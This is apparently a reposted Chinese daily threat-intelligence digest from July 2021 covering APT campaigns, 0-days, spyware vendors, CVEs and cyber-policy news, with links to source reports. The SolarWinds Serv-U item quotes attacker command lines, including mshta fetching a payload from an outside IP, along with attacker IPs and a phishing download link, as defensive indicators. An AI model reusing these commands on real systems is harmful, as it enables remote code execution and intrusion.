记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

今日威胁情报2021/7/18(第374期)

2021-07-18 18:23


高级威胁分析


1、微软发现攻击者(疑似兔子)利用 0 天漏洞攻击 SolarWinds Serv-U 软件

C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)cmd.exe /c whoami > “./Client/Common/redacted.txt”cmd.exe /c dir > “.\Client\Common\redacted.txt”cmd.exe /c “”C:\Windows\Temp\Serv-U.bat””powershell.exe C:\Windows\Temp\Serv-U.batcmd.exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”
98[.]176[.]196[.]8968[.]235[.]178[.]32208[.]113[.]35[.]58144[.]34[.]179[.]16297[.]77[.]97[.]58hxxp://144[.]34[.]179[.]162/aC:\Windows\Temp\Serv-U.batC:\Windows\Temp\test\current.dmp

https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/


2、LuminousMoth APT:针对少数选定的攻击

hxxps://www.dropbox[.]com/s/esh1ywo9irbexvd/COVID-19%20Case%2012-11-2020.rar?dl=0&file_subpath=%2FCOVID-19+Case+12-11-2020%2FCOVID-19+Case+12-11-2020(2).docx

向受害者发送鱼叉式网络钓鱼电子邮件,其中包含一个 Dropbox 下载链接,点击该链接后,会生成一个旨在模仿 Word 文档的 RAR 存档。存档文件本身带有两个恶意 DLL 库(“version.dll”和“wwlib.dll”)和两个运行恶意软件的相应可执行文件。

https://securelist.com/apt-luminousmoth/103332/


3、 黑客利用 iOS 0-day 入侵 iPhone

https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/


4、以色列公司帮助政府针对记者、活动家使用 0-Days 和间谍软件

https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/

https://blogs.microsoft.com/on-the-issues/2021/07/15/cyberweapons-cybersecurity-sourgum-malware/


5、Facebook 表示,一群伊朗黑客在 Facebook 上针对美国军事人员,部署了一项“资源丰富且持续不断的行动”,目标是美国的近 200 名与军队以及国防和航空航天公司相关的个人。

https://www.cbsnews.com/news/facebook-iran-hackers-us-military-defense-contractors-fake-accounts/


技术分享


1、认识 WiFiDemon – iOS WiFi RCE 0-Day 漏洞,以及默默修补的零点击漏洞

  • 最近在 iOS 14 – iOS 14.4 上悄悄修补的 0-click WiFi 邻近漏洞没有任何指定的 CVE

  • 公开宣布的 WiFi 拒绝服务 (DoS) 错误(目前为 0day)不仅仅是一个 DoS,而且实际上是一个 RCE!

  • 分析这两个错误中的任何一个是否在我们的云用户群中被利用。

https://blog.zecops.com/research/meet-wifidemon-ios-wifi-rce-0-day-vulnerability-and-a-zero-click-vulnerability-that-was-silently-patched/


2、CloudFlare CDNJS 错误可能导致广泛的供应链攻击

https://blog.ryotak.me/post/cdnjs-remote-code-execution-en/


3、防弹主机二三事,多看看,多学习,在严格的环境中,这些主机都该被ban

https://www.riskiq.com/blog/external-threat-management/media-land-bulletproof-hosting-provider-is-a-playground-for-threat-actors/


4、密码学家发现 Telegram 加密协议中的漏洞,一个国际计算机科学家团队周五报告说,他们在流行的加密消息应用程序 Telegram 中发现了四个加密漏洞。

https://www.cyberscoop.com/telegram-app-security-encryption/


漏洞相关


1、CVE-2021-22555:将 \x00\x00 变成 10000$,CVE-2021-22555 是 Linux Netfilter 中一个已有 15 年历史的堆越界写入漏洞,其功能强大到足以绕过所有现代安全缓解措施并实现内核代码执行。

https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html


2、Windows 打印后台处理程序特权提升漏洞CVE-2021-34481

Determine if the Print Spooler service is runningRun the following in Windows PowerShell:Get-Service -Name SpoolerIf the Print Spooler is running or if the service is not disabled, follow these steps:Stop and disable the Print Spooler serviceIf stopping and disabling the Print Spooler service is appropriate for your environment, run the following in Windows PowerShell:Stop-Service -Name Spooler -ForceSet-Service -Name Spooler -StartupType DisabledImpact of workaround Stopping and disabling the Print Spooler service disables the ability to print both locally and remotely.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481


3、Juniper Networks 的 Steel-Belted Radius (SBR) 运营商版中的一个严重的远程代码执行漏洞使得开放的无线运营商和固定运营商网络可以被篡改。( CVE-2021-0276 ) 影响使用可扩展身份验证协议的 SBR 运营商版本 8.4.1、8.5.0 和 8.6.0。


网络战与网络情报


1、以色列公司仍协助沙特进行间谍活动以色列无视沙特阿拉伯滥用以色列间谍软件压制国内外异议的担忧,鼓励其公司与该国合作。

https://www.nytimes.com/2021/07/17/world/middleeast/israel-saudi-khashoggi-hacking-nso.html

阿联酋利用美国和以色列专家在海湾网络战中占据优势地位,阿联酋雇佣了前 NSA 员工来建立一个可能针对美国公民和其他人的间谍行动。

https://arstechnica.com/information-technology/2019/02/uae-buys-its-way-toward-supremacy-in-gulf-cyberwar-using-us-and-israeli-experts/


2、美国政府商务部制裁俄罗斯公司实体:

    添加到黑名单的实体是 Aktsionernoe Obshchaestvo AST;Aktsionernoe Obshchestvo Pasit; Aktsionernoe Obshchestvo Pozitiv Teknolodzhiz,也称为 JSC Positive Technologies;联邦国家自治机构军事创新科技城时代;联邦国家自治科学机构科学研究所专业安全计算设备和自动化(SVA);和 Obshchestvo S Ogranichennoi Otvetstvennostyu Neobit。Era是俄罗斯国防部运营的研究中心和技术园区;Pasit 是一家 IT 公司,为支持俄罗斯外国情报局的恶意网络操作进行了研发;SVA 是一家俄罗斯国有机构,也支持恶意网络操作;据美国称,俄罗斯 IT 安全公司 Neobit、AST 和 Positive Technologies 的客户包括俄罗斯政府。

https://www.reuters.com/technology/us-restricts-sales-russian-it-security-firms-other-entities-2021-07-16/


3、FBI在暗网跟踪犯罪分子的手机后门分析

https://www.vice.com/en/article/n7b4gg/anom-phone-arcaneos-fbi-backdoor


4、英国间谍机构军情五处发布年度威胁报告

https://www.mi5.gov.uk/news/director-general-ken-mccallum-gives-annual-threat-update-2021


5、美国机构发出警告,称中国为窃取一系列目标的机密而进行的“侵略性”黑客活

https://www.cyberscoop.com/china-hacking-fbi-biden-alert-ip/


6、美国政府启动计划,从加密货币中切断网络犯罪分子

https://www.cyberscoop.com/us-government-crypocurrency-ransomware-criminals-treasury-state-reward/




知识来源: https://mp.weixin.qq.com/s?__biz=MzUxMDk3ODEwOA==&mid=2247486761&idx=1&sn=90576daf69858ed1bc1e630fdb0f217d

阅读:415965 | 评论:0 | 标签:情报 威胁情报

想收藏或者和大家分享这篇好文章→复制链接地址

“今日威胁情报2021/7/18(第374期)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

十年经营持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

🙇🧎¥由自富财,长成起一↓

标签云 ☁